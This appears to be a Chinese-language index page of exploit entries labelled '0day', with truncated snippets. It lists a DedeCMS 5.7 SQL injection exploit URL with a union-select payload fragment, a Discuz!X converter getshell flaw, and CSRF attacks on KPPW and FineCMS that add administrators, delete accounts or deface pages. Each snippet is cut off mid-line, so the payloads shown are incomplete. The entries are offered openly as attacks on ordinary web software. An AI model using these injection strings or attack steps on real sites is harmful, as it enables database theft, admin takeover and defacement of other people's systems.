FROM http://www.exploit-db.com/exploits/36161/ ==================================================== Product: E…
分类:0day
DedeCMS 20140201 之前的5.7通杀
无需注册会员账号: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//…
Discuz!X系列转换工具任意代码写入漏洞 getshell
有些论坛 可能路径放在其它目录 没有utility 直接convert等 如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功 http://mianguage.com/utility/convert/ind…
KPPW最新版本(Csrf删除任意帐号/添加管理员)
漏洞作者: 浅蓝 详细说明: http://localhost/KPPW/index.php?do=user&view=message&op=send http://localhost/KPPW/inde…
FineCMS轻量版csrf漏洞后台添加管理+任意挂黑页
漏洞作者: 蛇精病 漏洞证明: 1、后台,管理员,添加 2、抓包截断 没有验证 3、构造表单 4、挂黑页,他有一个模版,里面可以添加修改html文件 截断一下,看也是……